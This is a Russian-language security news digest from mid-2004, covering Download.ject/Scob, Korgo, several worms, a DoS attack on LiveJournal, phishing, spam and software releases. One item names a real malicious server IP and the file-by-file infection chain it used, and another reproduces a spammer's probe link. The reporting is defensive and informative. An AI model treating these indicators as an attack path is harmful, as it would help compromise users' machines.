Apple, Macromedia, Opera, Sun и Mozilla Foundation объединились для создания нового унифицированного plugin-интерфейса и API для браузеров. В частности, планируется расширить и улучшить Netscape Plugin Application Program Interface (NPAPI) таким образом, чтобы предоставить большие возможности взаимодействия и скриптинга таких плагинов, как Flash, ShockWave, Java и QuickTime. API будет выпущен под OpenSource-лицензией, и будет реализован по крайней мере в Mozilla (и всех браузерах на его основе), Opera и Safari. Таким образом, плагины, написанные с использованием нового API, будет легко сделать кроссплатформенными. Настораживает лишь то, что Microsoft пока никак не прокомментировала эту инициативу.
Пресс-релиз

1/07/2004 11:04 DoS-атака на LiveJournal
30 июня сервер известного проекта LiveJournal.com подвергся распределенной DoS-атаке (отказ от обслуживания). В рамках "Живого журнала" пользователи бесплатно могут создать свой виртуальный дневник и просматривать записи друг друга. "Живой Журнал" весьма популярен в России, дневники в нем видут многие видные деятели Рунета. По причине DoS-атаки многие пользователи отрезаны от своих дневников и не могут просмотреть страницы своего журнала и дневников своих друзей. Другие пользователи, впрочем, никаких затруднений не испытывают. Администраторы проекта объясняют, что к решению проблемы уже подключились правоохранительные органы и агенты ФБР. Это позволяет надеяться, что необходимые меры предприняты и преступники будут наказаны. О злоумышленниках, которые устроили атаку, администраторы LiveJournal говорят следующим образом: "Это не хакеры. Если представить, что хакеры - это те парни, которые замыкают провода и крадут машины без ключа, то напавшие на наш сервер лишь режут шины ножами, которые они даже не сделали сами."
"Компьюлента"

1/07/2004 09:40 Microsoft нацелилась на программистов-любителей
Microsoft предложит непрофессиональным разработчикам модернизированное семейство инструментов, куда войдет бесплатная версия SQL Server. Как и ожидалось, во вторник на конференции TechEd Europe в Амстердаме компания представила новое семейство инструментов программирования. Облегченные версии инструментов и база данных призваны расширить проникновение Microsoft в среду студентов и программистов-любителей. В первом полугодии будущего года Microsoft обещает выпустить пакет Express, включающий упрощенные версии продуктов Visual Basic, Visual C#, Visual C++ и Visual J++. К тому же времени компания планирует подготовить бесплатную версию своей СУБД SQL Server Express Edition, а также новый продукт Visual Web Developer 2005 Express Edition для разработки веб-сайтов и веб-сервисов. По словам директора по маркетингу отделения средств разработки Microsoft Джона Монтгомери, инструменты будут стоить «десятки долларов». Стоимость полных профессиональных версий инструментов Microsoft может доходить до $2000. Инициатива по выпуску дешевых инструментов нацелена также на то, чтобы притупить растущую популярность open source-альтернатив Windows, таких как Linux. Долгие годы Microsoft опиралась на свою гигантскую армию Windows-программистов и лелеяла ее. В свою очередь приложения, созданные этими программистами за последние два десятилетия, способствовали росту популярности самой Windows.
ZDNet

1/07/2004 09:27 Обнаружен "банковский" вирус, распространяющийся через всплывающую рекламу
Специалисты по компьютерной безопасности обнаружили новый компьютерный вирус, использующий ранее неизвестную, но потенциально весьма опасную технологию распространения. Как сообщает в среду газета Washington Post, вирус, для которого еще не придумали маркировки, предназначен для перехвата данных о банковских счетах пользователя. Он заражает компьютеры, используя одну из известных уязвимостей браузера Microsoft Internet Explorer, исправление для которой вышло в апреле этого года. Заражение происходит при самопроизвольном открытии нового окна браузера при заходе на некоторые сайты, которые загружают рекламу с определенных рекламных серверов. Эксперты предполагают, что автор вируса взломал серверы рекламного агентства и внедрил туда свой код. При заражении компьютера пользователя вирус перехватывает сигналы, идущие с клавиатуры, и при упоминании одного из примерно 50 банков из его списка, начинает копировать сопровождающую информацию и, как предполагается, отправлять ее на некий сайт, базирующийся в Эстонии. Эксперты отмечают, что данный тип вируса использует принципиально новый метод перехвата конфиденциальных данных - "прослушивая" сигналы непосредственно с клавиатуры. Таким образом он обходит зашифрованное соединение браузера клиента с сервером банка, что делает в его случае неэффективными традиционные средства электронной защиты информации. Широкое распространение базирующихся на подобной технологии вирусов может ощутимо навредить применяющимся сейчас системам интернет-платежей. Вирус не заражает компьютеры пользователей, работающих с браузерами, отличными от Internet Explorer. Не заражается также Internet Explorer, в котором установлены последние обновления безопасности от Microsoft или программы, блокирующие "всплывающие" окна.
Lenta.Ru

30/06/2004 11:06 Вышли Firefox 0.9.1 и Thunderbird 0.7.1
Как сообщает linux.org.ru, вышли новые версии автономных продуктов проекта Mozilla - браузер Firefox и почтовый клиент Thunderbird. Исправлены некоторые баги в новом менеджере расширений и системе автоматического обновления. Кроме того, несколько изменена новая стандартная тема. Списка конкретных изменений не наблюдается.
Источник

30/06/2004 10:53 Татарский хакер увел с кредитных карт 15000 долларов
16-летний житель Лениногорска использовал традиционную уловку для получения конфиденциальной информации о кредитных картах. Программа-ловушка сообщала юноше все реквизиты карт будущих жертв. Молодой человек предлагал через Интернет оказания ряда услуг: web-дизайн, оформление сайтов и их информационное сопровождение. После того, как информация о картах заказчиков попадала в его руки, юноша с присущим подростку размахом использовал электронные деньги вчерашних клиентов. Он сделал заказы в 82 интернет-магазинах. В числе заказанного им - партии CD-дисков, различные иностранные компьютерные издания, лицензионное программное обеспечение, которое ему должны были доставить из Австралии. Своей девушке хакер заказал из Голландии целый грузовик роз. Посетители сайта-ловушки davlet.ru обратились в милицию. Три месяца ушло на то, чтобы вычислить место и организатора кражи, доказав его вину. Хакер действовал крайне осторожно, меняя исходные данные и адреса доставки покупок. Сотрудники подразделения "К" МВД РТ задержали лениногорца буквально через неделю после того, как его афера практически вышла на международный уровень. Юноша свободно владел английским языком и зарегистрировал свой виртуальный магазин на одном из зарубежных серверов, сообщает "Татар-информ". Преступника задержали в одном из офисов Лениногорска, где он работал системным администратором в двух местных фирмах. В свои 16 лет юноша является постоянным победителем Всероссийских олимпиад по информатике, различных конкурсов по web-дизайну, сетевому администрированию и информационной безопасности. Большая часть пострадавших от аферы лениногорского хакера - иностранцы.
Internet.Ru

30/06/2004 10:27 VeriSign представила почтовые и антифишинговые услуги
Новые услуги, представленные компанией VeriSign, помогут бизнесу бороться с почтовым спамом, компьютерными вирусами и ещё одной формой онлайнового мошенничеств - «фишингом». VeriSign Email Security Service – это управляемая почтовая система, которая перехватывает, сканирует и фильтрует трафик сообщений электронной почты перед тем, как переслать его на почтовые серверы клиентов. По информации VeriSign, отдельная программа под названием Anti-Phishing Solution предназначена для того, чтобы помочь компаниям обнаруживать и бороться с мошенничеством, направленным против их клиентов. По словам Чеда Кинзелберга (Chad Kinzelberg), вице-президента VeriSign, новая услуга будет помогать организациям в борьбе с такими напастями современности, как почтовый спам, что снижает производительность труда. Для того чтобы воспользоваться услугой, клиенты VeriSign должны изменить адреса их почтового сервера (МХ) на адреса серверов VeriSign Email Security Service. С помощью MX-записей другие серверы, использующие протокол SMTP, получают информацию о том, куда направлять почту для данного домена. VeriSign использует технологию управления и защиты почты от компании FrontBridge Technologies. Продукты FrontBridge предоставляют базовые функции очистки от спама, а также антивирус и возможности аварийного восстановления службы VeriSign. Несколько антивирусных движков, предоставленных компаниями Sophos, Symantec и Trend Micro, будут сканировать всю почту клиентов, приходящую в центр данных VeriSign. Эвристические фильтры, встроенные в систему от FrontBridge, помогут отбирать, удалять или помещать в карантин письма, похожие на спам. По словам Кинзелберга, клиенты сумеют сами создавать политики для блокирования сообщений, имеющих нежелательное содержание.
CNews.ru

30/06/2004 10:04 Sun представила новую версию платформы Java
Компания Sun Microsystems представила на конференции JavaOne в Сан-Франциско новую версию платформы Java 2 Standard Edition (J2SE), получившую индекс J2SE 5.0, cообщает "Компьюлента". По заявлениям компании, это самая серьезная модернизация технологии Java за последние пять лет. Этот проект развивался в течение нескольких последних лет и до последнего времени носил кодовое название Tiger (не путать с новой операционной системой от Apple). Пока Sun выпустила только бета-версию инструментария для разработчиков приложений на базе J2SE 5.0. В состав этого комплекта, доступного на сайте компании, входят все необходимые компоненты: отладчик, компиляторы и виртуальные машины для выполнения Java-программ. В J2SE 5.0 появилось порядка сотни нововведений, облегчающих труд разработчиков, а также повышающих производительность приложений. Среди нововведений особо отмечаются перечисляемые и параметризированные типы (аналог шаблонов в C++), поддержку метаданных. Кроме того, в новом варианте Java уменьшилось число участков кода, предшествующих основной части программы, облегчая тем самым работу программистов. В состав новой версии платформы Java имеются также программные интерфейсы для мониторинга работы приложений и управления ими. С их помощью можно дистанционно отслеживать состояние виртуальной машины. В состав J2SE 5.0 включена поддержка OpenGL. А утилита Pack200 позволяет сжимать программы на Java, что призвано облегчить доступ к аплетам и Java-приложениям через интернет. Одновременно в Sun кипит работа и над Java 2 Platform Enterprise Edition (J2EE) 5.0. В этой версии платформы планируется облегчить создание на базе Java стандартных модулей для корпоративных информационных систем, а также усовершенствованными инструментами для создания веб-сервисов.
Пресс-релиз

30/06/2004 09:48 Билл Гейтс: «Пиратское ПО — основная угроза для Windows»
Вместо того, чтобы лично возглавить латание дыр в своей ОС, Билл Гейтс колесит по Австралии, раздавая направо и налево интервью об ОС Windows. Вот ещё несколько очередных позиций из его PR-компании. «Знаете, кто мой главный конкурент? — спросил Гейтс на брифинге для прессы в Сиднее (Австралия). — Это пиратское ПО… Если оглянуться вокруг, то пиратских копий Windows увидишь больше, чем программ open source. Гораздо больше». Гейтс сказал, что ПО Microsoft «значительно выше и лучше, чем все, что может предложить мир open source. Просто пресса выхватывает несколько удачных вещей и говорит: „Вот, глядите!” И вы знаете, это хорошо; для нас даже полезно, когда есть что-то другое, и люди могут его пощупать». «Они поймут, что значит быть самому себе системным интегратором. Они скажут: „ОК, это у меня есть, а где мне взять Active Directory? Где взять обновление? Где взять другие приложения?” И они увидят… что к этому добавляются разные проблемы интеллектуальной собственности». Гейтс сделал эти замечания во время турне по Австралии, во время которого он планировал встретиться с премьер-министром этой страны Джоном Говардом. Из всего вышесказанного можно сделать вполне однозначный вывод - для главы мегакорпорации получение сверхприбылей намного важнее безопасности продуктов, выпускаемых этой корпорацией. А что же будет после выхода Microsoft на рынок кластерных и суперкомпьютерных технологий? Попутно хотелось бы добавить свои 2 копейки в копилку Билла Гейтса (хотя вряд ли они серьёзно поднимут его благосостояние) - IMHO, пиратское ПО на самом деле скорее является движущей силой популяризации семейства ПО Microsoft, если задуматься. Многие ли могли бы позволить себе поставить (в том числе и для ознакомления) лицензионные версии Windows XP Prof., Win2K Server, Win2003 Server в нашей стране при существующем уровне доходов населения? Это даже компаниям среднего уровня довольно накладно.
Подробности

30/06/2004 09:33 Официальные комментарии HangUP Team по поводу обвинений, выдвинутых Касперским
Если вы помните, в ходе разбирательства с нашумевшей Интернет атакой и анализом кода "Padodor" (он же Korgo) "Лабораторией Касперского" в лице Евгения Касперского против группы HangUP Team были выдвинуты обвинения в создании этого трояна (якобы в коде трояна присутствует фраза "Coded by HangUp Team"). Группа HangUP решила со своей стороны прокомментировать подобные высказывания Касперского (который, надо признать, в крайнее время напоминает библейского Иоанна Богослова с его "Апокалипсисом"). В наш адрес была прислана ссылка, в которой ребята комментируют высказывания Касперского и других электронных СМИ по поводу cвоей команды. Со своей стороны, мы не могли не предоставить слово противположной стороне, поскольку считаем подобную позицию вполне обоснованной. Единственное замечание - в тексте "Ответа Чемберлену" присутствует большое количество ненормативной лексики (по-видимому, для усиления производимого эффекта), поэтому стиль изложения комментариев оставляем исключительно на совести авторов послания.
Ответ HangUP

29/06/2004 21:18 Исходный код загрузчика трояна, заразившего Интернет
Franck Olivel из французской компании K-OTik Security опубликовал исходный код загрузчика трояна, заразившего в результате нашумевшей эпидемии множество хостов в Интернет. Как пишет сам автор, Исходный код загружался с различных ресурсов сервера 217.107.218.147, принадлежащего московской компании E-Neverland Internet Solutions. Заражение и загрузка происходили по следующей схеме (в порядке очерёдности) заражённая машина -> перенаправление -> http://217.107.218.147/dot.php (перенаправление) -> new.htm -> выполнение связки md.htm & shellscript_loader.js -> выполнение shellscript.js, который, собственно, и загружаел тело трояна msits.exe с последующей инсталляцией в системе. Приведены исходные коды файлов new.htm, md.htm и скриптов shellscript_loader.js, shellscript.js. Действие самого трояна достаточно подробно описано на сайте Symantec, в бюллетене которой также приведены меры по устранению трояна. Напомним также, что уязвимость в IIS 5 (через которую, собственно, и происходил взлом серверов) закрывал патч, описанный в бюллетене по безопасности MS04-11.
Исходники и описание
Бюллетень Symantec

29/06/2004 14:45 Сбой в МТС
На следующий день после того, как в сети «Би Лайн» случился сбой, проблемы с оплатой счетов и пополнением баланса начались у абонентов МТС в Москве и Подмосковье. Пользователей «Джинс» напугали введением сроков действия "бессрочных" платежей. Особенно остро это отразилось на дачниках, которые не могли быстро оплатить свои счета. Первый тревожный звоночек в МТС прозвучал в пятницу утром. Пользователи тарифных планов «Джинс», пытавшиеся пополнить баланс, столкнулись с трудностью прохождения платежей - сервис был недоступен. Проблема имела явно не локальный характер: о задержках с проплатой предупреждали автоматы по приему денег в разных концах Москвы и кассиры в супермаркетах, принимающие деньги за мобильную связь. В итоге те, кому был срочно нужен телефон, не могли им воспользоваться, поскольку оператор просто был не в состоянии оперативно пополнять абонентские счета. Особенно острой эта проблема была для дачников, отправившихся подальше от супермаркетов и банкоматов на огороды. Между тем МТС проблемы с оплатой счетов отрицает. По словам директора департамента внешних связей МТС Андрея Брагинского, у компании не было никаких проблем с приемом платежей. Правда, Брагинский признал, что пятница - день повышенной нагрузки и люди стремятся внести средства на счет накануне выходных. 'Давным-давно, когда счет можно было пополнить только через кассы МТС и скретч-карточки, по пятницам абонентам приходилось стоять в очереди, - пояснил он. - Сейчас существуют разные способы оплаты телефона, так что очередей нет, но пятница все равно остается наиболее загруженным днем'. Скорее всего, как рассказал источник в одной из крупных телекоммуникационных компаний, проблема связана с биллинговой системой - оператор использует систему CBOSS. Претензий к ней за последние годы было много: тут и обвинения пользователей в краже денег со счетов, и проблемы с детализацией в 'Джинсе', которую таковой можно назвать с большой натяжкой - вместо привычных для контрактных абонентов счетов с подробной разбивкой по звонкам и SMS пользователи «Джинс» получают урезанную версию счета, в котором все расходы сведены к голосовому трафику.
gzt.ru

29/06/2004 14:11 Троян MSNPeriod изменяет записи в MSN Messenger
Сотрудники компании Network Associates обнаружили новую вредоносную программу MSNPeriod, представляющую собой исполняемый файл размером 20480 байт. Вирус рассылается вручную пользователям интернет-пейджера MSN Messenger. В коде червя имеются ошибки, а также характерная текстовая строка, содержащая фразу "I Got My Period". Заражение происходит только в том случае, если владелец компьютера запускает полученный файл. После этого MSNPeriod может изменять имена, отображаемые программой MSN Messenger. Вирус не представляет большой опасности, поскольку не способен самостоятельно распространяться и внедряться в удаленную систему.
"Компьюлента"

29/06/2004 13:50 Symantec Brightmail Anti-Spam становится умнее
Вчера корпорация Symantec выпустила Brightmail Anti-Spam 6.0. Новый продукт разработан для обеспечения защиты предприятий от распространения спама с использованием последних технологий, используя такие средства, как фильтры на языках, отличных от английского, и расширенные функции администрирования. Symantec Brightmail Anti-Spam 6.0 также включает центр управления на основе веб-технологии, объединённые средства ведения журналов и генерации отчётов, а также глобальные политики, которые могут быть созданы для отдельных пользователей или целых групп. В дополнение к фильтрам для языков, отличных от английского, сеть Symantec Brightmail Probe Network привлекает и анализирует спам из 20 стран мира, а Symantec Brightmail Logistics and Operations Centers (BLOC) предлагает совместимость с местными языковыми особенностями Сан-Франциско, Дублина, Сиднея и Тайбея. Технология подписи прикрёплённых файлов, включенная в Symantec Brightmail Anti-Spam 6.0, позволяет создавать фильтры на основе вложений, кодированных в MIME, например, определение порнографических изображений. Подписи прикреплённых файлов защищают организации от спама, распространяющего наиболее часто встречающиеся файлы. Служба обновляет списки каждый час и предлагает пользователям возможность использовать два новых списка – подозрительных IP и надёжных IP.
CNews

29/06/2004 13:22 Уязвимость в пакете giFT-FastTrack
Датская компания Secunia сообщает о наличии уязвимости в пакете giFT-FastTrack, представляющем собой открытую реализацию протокола FastTrack P2P, используемого файлообменными сетями KaZaA, iMesh и Grokster. Проблема связана с неправильной обработкой нулевых указателей, пишет "Компьюлента". Эксплуатируя дыру, злоумышленники, теоретически, могут организовать DoS-атаку на уязвимую систему. Ошибка присутствует в giFT-FastTrack версий до 0.8.6 включительно. Устранить дыру можно путем установки обновления, доступного на сайте разработчиков.
Secunia

29/06/2004 13:15 Русская мафия добралась до Австралийских банков
Международная организованная преступная группа Интернет-мошенников украла сотни тысяч долларов со счетов Банка Northern Territory. По заявлению пресс-секретаря Федеральной Полиции Австралии преступная группа расположена в Восточной Европе. По мнению правоохранителей, вероятней всего, это преступление – дело рук «Русской мафии», которая занималась кражей персональных данных, паролей и номеров счетов.Для получения такой информации преступники использовали поддельные сайты легальных компаний, так называемый «phishing» и «Троянские Кони». Департамент полиции и Центр по борьбе с преступлениями в сфере высоких технологий Австралии создали специальную следственную группу для исследования феномена роста компьютерных преступлений не только в количественном, но и в стоимостном отношении. Следственная группа будет работать совместно с международными подразделениями, такими как, например, ФБР. Австралийская Ассоциация Банкиров, заявила о том, что в состав следственной группы войдут специалисты из крупнейших банков страны. Кроме того, многие банки ведут разъяснительную работу с населением, публикуя в крупнейших изданиях правила «Как защитить себя от Интернет-Банкинга». Одновременно с тем, по понятным причинам, банкиры не подтверждают факт нанесения ущерба вкладчикам, говоря только об убытках банка. Однако, по заявлению пресс-секретаря Национального Банка Австралии, если установится факт нанесения ущерба вкладчикам, ущерб будет возмещен в полной мере. По словам пресс-секретаря Австралийской Полиции в истории департамента, еще не было инцидента, связанного с утечкой из австралийских банков таких огромных сумм.
Crime-research.ru

29/06/2004 12:01 Использование Internet Explorer опасно для здоровья
С таким вот утверждением вышел очередной бюллетень US-CERT (U.S. Computer Emergency Readiness Team), официальной организации США, ответственной за защиту от онлайновых угроз. В пятницу она рекомендовала системным администраторам рассмотреть возможность перехода на один из шести альтернативных браузеров. «В технологиях, используемых в IE, есть ряд существенных уязвимостей, — говорится в рекомендации. — Используя другой браузер, особенно при посещении сомнительных сайтов, можно значительно уменьшить опасность этих уязвимостей». В ней отмечается также, что у Internet Explorer очень много проблем в нескольких ключевых технологиях, таких как сценарии Active X, его модель зон безопасности и JavaScript. Отключив их, можно повысить степень защиты. «Использование другого браузера — лишь одна из возможностей, — уточняет Арт Мэньон, аналитик организации CERT Coordination Center, управляющей US-CERT. — Мы не рекомендуем какой-то продукт вместо другого продукта. С другой стороны, наивно говорить, что это соображение не нужно принимать во внимание при выборе модели обеспечения безопасности». CERT подчеркивает также, что те, кто выбрал альтернативный браузер, но продолжает использовать операционную систему Windows, все равно рискуют, так как сама ОС в большой степени опирается на функциональность IE. US-CERT поддерживают также множество других специалистов по безопасности. «Я надеюсь, что Microsoft быстро выпустит поправку, — комментирует главный технолог Internet Storm Center Йоган Ульрих. — А до тех пор у пользователей по сути есть две альтернативы: запретить JavaScript в Internet Explorer или установить другой браузер». Хофманн из Mozilla рекомендует пользователям Windows, желающим укрепить Internet Explorer, повысить уровень защиты в параметрах безопасности интернета в Windows, чтобы ослабить угрозу таких атак. По умолчанию выбран уровень «средний», но если заменить его на «высокий», это спасло бы от атак, подобных эксплойту прошлой недели. Он призвал также веб-разработчикам прекратить создавать веб-сайты, опирающиеся на ActiveX. Опаснее всего, по его мнению, сайты, куда закачивают фотографии, и игровые сайты. «Мы призываем людей не использовать уязвимые проприетарные технологии, — говорит Хофманн. — Больше всего эксплойтов связано с ActiveX. А по последним из них видно, что пользователи, которым эта технология доступна, подвергаются реальной опасности. Сайтам следует хорошенько подумать, что они могут сделать, чтобы защитить пользователей». В подобной ситуации абсолютно непонятна позиция самой M$, до сих пор не осчастливившей несчастных пользователей "лучшего браузера всех времян и народов" соответствующей заплатой. По этом поводу хотелось бы привести слова Билла Гейтса, сказанные во время визита в Австралию: "Теперь нам нужно не только очень быстро сделать эти "заплатки", но и убедить людей включить автоматическое обновление".
Бюллетень US-CERT

29/06/2004 11:39 Стив Джобс обогнал Гейтса в разработке операционных систем
Компания Apple представила новую операционную систему семейства Mac OS X, которая получила название Tiger. Выступая на конференции разработчиков программного обеспечения в Сан-Франциско глава компании Стив Джобс заявил, что Apple на несколько лет обогнала компанию Microsoft. Эксперты признают, что в Tiger реализована расширенная система поиска, которая должна стать одним из ключевых элементов операционной системы Microsoft Longhorn, передает агентство Reuters. По словам Джобса, Tiger поступит в продажу в начале следующего года. Цена новой операционной системы составит 129 долларов. Microsoft планирует выпустить Longhorn не ранее 2006 года. Apple утверждает, что в Tiger воплощены более 150 новых разработок. Помимо улучшенных возможностей для поиска в операционную систему включен усовершенствованный веб-браузер Safari RSS, использующий стандарт Really Simple Syndication, который позволяет оповещать пользователей о каждом обновлении их любимых ресурсов. Кроме того, в Tiger установлена новая программа для проведения телеконференций iChat AV, позволяющая одновременно общаться с тремя собеседниками. Предыдущая версию своей операционной системы - Mac OS X Panther - Apple выпустила в октябре прошлого года. Последняя операционная система Microsoft Windows XP появилась в октябре 2001 года.
Lenta.ru

29/06/2004 10:45 Закрыт российский сервер, взломавший Explorer
Прекратил работу российский сервер, позволявший хакерам получать полный доступ к компьютерам пользователей браузера Internet Explorer в операционной системе Windows. Ничего не подозревающие пользователи попадали на этот сервер через вполне авторитетные веб-сайты, и хакерская программа "открывала" их машины, пользуясь пробелами в системе защиты Internet Explorer. Когда две недели назад эксперты впервые узнали о существовании зловредного сервера, они даже порекомендовали пользователям на время прекратить использование браузера производства Microsoft. Теперь опасность, судя по всему, значительно уменьшилась, однако Microsoft пока не разработал "заплатку" (патч) для червя, пробиравшегося в компьютеры через российский сервер. Компания призывает пользователей обновить свои браузеры, повысить настройки безопасности до высокого уровня и запретить использование протоколов Java. Впрочем, Microsoft признает, что такие изменения могут вызвать некорректное отображение некоторых сайтов. Компьютерный гигант также разместил на своем сайте инструкцию для тех, кто мог стать жертвой нового вируса, получившего название download.ject. Он похож на ранее существовавшие так называемые "троянские" программы. Пока точно неизвестно, какое именно количество серверов и компьютеров пострадали от российских хакеров. Однако список жертв мог быть гораздо больше, если бы интернет-провайдеры на прошлой неделе не начали блокировать доступ к хакерскому серверу. По данным фирмы Lurhq, специализирующейся на компьютерной безопасности, российский "троян", взламывавший компьютеры, воровал логины и пароли для таких интернет-порталов, как Ebay, Paypal, Earthlink, Juno и Yahoo. Согласно информации, которую опубликовал в Bugtraq Dan Hubbard, на основании проевдённого анализа трояна Scob, в качестве источника заражения использовались ресурсы Вэб-сервера с IP 217.107.218.147. Согласно информации WHOIS, IP-адрес принадлежит сети компании "E-Neverland", расположенной в Москве. Как было сказано выше, сервер нанастоящий момент прикрыт.
BBC News

28/06/2004 15:23 Подробности осуждения "первого спаммера"
Недавно по различным информационным каналам (в том числе и телевизионным) проходила информация о поимке и осуждении "первого спаммера", разославшего 15000 SMS-сообщений нецензурного содержания абонентам "Мегафон". На сайте SecurityLab опубликовано письмо одного из "соучастников" этоо инцидента, где он (надеемся искренне) рассказывает о том, как всё было на самом деле. Как сказал один из участников в обсуждении письма: "Статья напоминает краткую инструкцию, о том как плохо давать свои пассы малознакомым людям :)". На всякий случай сообщаем, что в самом письме присутствует ненормативная лексика (немного).
Письмо

28/06/2004 14:39 Как не надо заниматься вымогательством
Некто Мирон Терещук 42 лет из Мэриленда обвинен в том, что отправлял в адрес конкурирующей фирмы письма с угрозами раскрыть конфиденциальные данные этой фирмы, которыми он завладел, cообщает bugtraq.ru. Вымогатель старательно заметал следы: письма приходили из незащищенных беспроводных сетей. Однако пару ошибок он всё же совершил. Во-первых, он с самого начала был в числе подозреваемых в силу не лучших отношений с конкурентом, а во-вторых, когда он прислал письмо с требованием 17 миллионов долларов, в нем было указано, что чек должен быть на имя Мирона Терещука.
Подробности

28/06/2004 14:27 Microsoft рубит сайты с плеча
В адрес «Вебпланеты» пришло письмо от компании Proantivirus Lab, занимающейся разработкой антивирусных программных продуктов. В своем письме компания сообщает, что корпорация Microsoft требует закрыть некоторые сайты Proantivirus Lab. Это требование представители Microsoft мотивируют тем, что вирус Korgo обменивается с сайтами Proantivirus Lab какой-то информацией. На сайте приведён полный текст письма.
Подробности

28/06/2004 13:41 Windows CE 5.0 уже на подходе
Пятая версия 'мобильной' операционной системы Windows CE должна появиться в продаже уже 9 июля. Стоит отметить, что гвоздем программы на этот раз станут даже не улучшения в программном коде, а изменения лицензионной политики Microsoft в отношении Windows CE. В надежде радикально увеличить пользовательскую базу, компания впервые решилась не только открыть часть 'исходников' системы, но и, по всей видимости, позволит компаниям-лицензиатам вносить произвольные изменения в исходный код программы, которые будут оставаться собственностью лицензиатов. Сейчас, как известно, любые попытки несанкционированной модификации программного кода прямо запрещены условиями лицензионного соглашения. Таким образом, пишет IDG, Windows CE становится на одну ступеньку ближе к операционным системам многочисленного семейства Linux, развиваемых за счет консолидированных усилий тысяч разработчиков, затачивающих принадлежащие им программы под собственные нужды. Компания обещает открыть пользователям Windows CE 5.0 более двух с половиной миллионов строк кода, включая собственно ядро, пользовательский интерфейс и библиотеку аппаратных драйверов.
Источник

28/06/2004 13:16 Митник будет читать лекции в Канаде
Самый скандально известный в мире хакер приедет в Кэйп Брентон, чтобы провести курс обучения по компьютерной безопасности. Кевин Митник (Kevin Mitnick), несколько раз отбывавший наказание за взломы компьютеров и кражи ПО, теперь стал консультантом по компьютерной безопасности и проведёт двухдневный семинар Certified Social Engineering Prevention Specialist на конференции Elite Developer Academy 2004 в канадском городе Сидней, провинция Новая Шотландия. Там Митник и другие разработчики в течение пяти дней с 22 по 27 августа опишут будущее разработки программного обеспечения. В последний день конференции посетители будут иметь возможность сдать экзамен на получение сертификата Certified Social Engineering Prevention Specialist. Факт прибытия Митника очень заинтересовал организаторов конференции. «Его присутствие и опыт вносят элемент глобальности и мирового класса в ход конференции, - сказал Донни Сноу (Donnie Snow), CEO компании Polar Bear Corporate Education Solutions, которая является организатором конференции, – он предлагает участникам возможность пройти его сертификацию, а также отличный шанс пообщаться с лучшими представителями в области безопасности». Кевин Митник является со основателем Defensive Thinking, консалтинговой фирмы в области компьютерной безопасности из Лос-Анджелеса.
CNews.ru

28/06/2004 12:43 Двойная безопасность
Компании "Интеллектуальные Системы Управления Бизнесом" и "Актив" подписали соглашение о технологическом партнерстве при реализации проектов в области информационной безопасности. В рамках соглашения разработана поддержка идентификаторов ruToken в программно-аппаратном продукте ESMART Access, который можно использовать, либо как самостоятельный комплекс, либо интегрировать в уже существующие системы защиты информации. Теперь же, поскольку ruToken содержит аппаратную реализацию российского стандарта шифрования (ГОСТ 28147-89), сфера применения комплекса ESMART Access значительно расширилась, и он может устанавливаться в государственных и других организациях, где действуют требования к использованию средств шифрования информации на базе российских стандартов.
Источник

28/06/2004 12:17 Недельный отчет о вирусах Panda Software
Антивирусная компания Panda Software опубликовала еженедельный отчёт о вирусной активности прошндшей недели. В отчёте рассмотрены шесть версий Korgo (T, S, R, Q, P, O и N), троянца Downloader.JH и утилиту скрытого управления IPScanner.A.
Отчёт

28/06/2004 11:57 Утвержден стандарт безопасности Wi-Fi
Спецификация защиты сетей Wi-Fi с получила окончательное одобрение организации по стандартизации, и теперь на очереди усовершенствования в области качества работы и быстродействия беспроводных сетей. Институт инженеров по электротехнике и электронике утвердил спецификацию 802.11i в качестве стандарта, подлежащего применению в сочетании с другими стандартами 802.11. Многие участники отрасли дожидались этого момента, однако некоторые элементы стандарта уже используются. Производители уже полгода продают продукты на основе предварительных версий 802.11i в расчете на то, что в окончательной спецификации значительных изменений не произойдет. Продукты Wi-Fi образуют беспроводные локальные сети, которые позволяют устанавливать связь между устройствами, передавать и принимать данные в радиусе 45 м. Стандарт 802.11i должен придать беспроводным сетям солидности в глазах предприятий. Прежние средства защиты, такие как Wired Equivalent Privacy, легко взламывались хакерами, что заставляло многих ИТ-менеджеров относится к беспроводным сетям с опаской. Стандарт 802.11i предполагает шифрование данных, передаваемых по беспроводной сети, защищая их от любого, кто перехватит эти данные. По словам директора Intel по маркетингу средств защиты Робина Рича, наиболее важным элементом стандарта 802.11i является Advanced Encryption Standard (AES), сильный алгоритм шифрования, поддерживающий ключи длиной 128, 192 и 256 бит.
Подробности

28/06/2004 11:20 Чешский червь Mota прячется в pif-файлах
Компания Network Associates зафиксировала появление вредоносной программы Mota, распространяющейся по электронной почте в виде файлов-вложений с расширениями .scr, .pif или .zip, cообщает "Компьюлента". После неосторожного запуска присланного файла пользователем ПК, червь Mota записывает собственную копию в директорию Windows и вносит изменения в реестр операционной системы, обеспечивая себе автоматический запуск. Далее копии вируса рассылаются по найденным в книге контактов почтового клиента или dbx/html-файлах адресам электронной почты. Родиной Mota, по всей видимости, является Чехия. Специалисты Network Associates присвоили вредоносной программе рейтинг низкой опасности.
Описание

27/06/2004 15:51 На Украине инициировали создание домена .INFO.UA
На Украине на сегодняшний день существуют домены второго уровня: .com.ua, .net.ua, .org.ua, .biz.ua, в которых есть возможность регистрации доменных имен третьего уровня конечным потребителям. Регистрация доменов второго уровня в домене UA разрешается лишь владельцам товарных знаков. В связи с тем, что домен .info.ua еще не существует, возникло предложение о создании данного домена. Оно было отправлено 24 июня 2004 года на рассмотрение действующего администратора домена UA -ООО "Хостмастер" и всем украинским регистраторам.
RU-Center

27/06/2004 14:48 Интересная методика в рассылке спама
Довольно интересная методика в рассылке спама была замечена сегодня из анализа поступившей почты (по крайней мере - раньше пока что такого замечено не было). На один почтовый адрес пришло письмо следующего содержания: Тема: "Вас ожидает открытка", Тело письма - "ДОСТАВКА ВИРТУАЛЬНЫХ ОТКРЫТОК
Поздравляем. Открытка Вас ждет по адресу:
http://www.rumata.ru/cgi-bin/cards/getcards/session?action=1;session=getcard;idcard=909672-424136953-0 Мы выбрали для Вас лучшее. Каждая открытка - сюрприз. DELUXER.RU". В обратном адресе значился почтовый адрес mtu-net.ru. Из анализа заголовков сразу насторожило, что сообщение высылалось не через сервер МТУ-Интел, а через один из китайских сайтов. Судя по всему, господа спамеры вот таким вот способом проверяют существование адреса, на который идёт рассылка. Согласно анализа IP-адреса сайта www.rumata.ru был сделан вывод о принадлежности его к сети провайдера Informtelecom XXI Ltd., что расположен в Москве. NOC провайдера будет выслано пламенное письмо о том, что они пригревают в своей сети спамерские сайты (либо сами занимаются рассылкой спама).
UINC

